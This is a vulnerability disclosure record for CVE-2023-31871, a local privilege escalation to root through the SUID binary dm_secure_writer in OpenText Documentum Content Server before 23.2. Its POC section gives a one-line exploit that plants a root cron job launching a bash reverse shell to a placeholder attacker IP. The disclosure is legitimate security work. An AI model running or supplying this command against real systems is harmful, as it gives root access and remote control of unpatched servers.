CVE-2023-31871: OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation

OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation

[Suggested description]

OpenText Documentum Content Server before 23.2 has a flaw that allows

for privilege escalation from a non-privileged Documentum user to root.

The software comes prepackaged with a root owned SUID binary

dm_secure_writer. The binary has security controls in place preventing

creation of a file in a non-owned directory, or as the root user.

However, these controls can be carefully bypassed to allow for an

arbitrary file write as root.

------------------------------------------

[Vulnerability Type]

Local Privilege Escalation via SetUID Binary

------------------------------------------

[Vendor of Product]

OpenText

------------------------------------------

[Affected Product Code Base]

Documentum Content Server - Before 23.2, Fixed in 23.2.

------------------------------------------

[Affected Component]

The affected SUID is dm_secure_writer.

------------------------------------------

[Attack Type]

Local

------------------------------------------

[Impact Code execution]

true

------------------------------------------

[Impact Escalation of Privileges]

true

------------------------------------------

[Attack Vectors]

Local access as the Documentum Content Server user to the machine with the affected software.

------------------------------------------

[Reference]

https://www.opentext.com/about/security-acknowledgements

------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]

true

------------------------------------------

[POC]

ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo “* * * * * root /tmp/test.sh” | /tmp/secure_writer test -1 /etc/cron.d/evilcron

------------------------------------------

[Discoverer]

@picar0jsu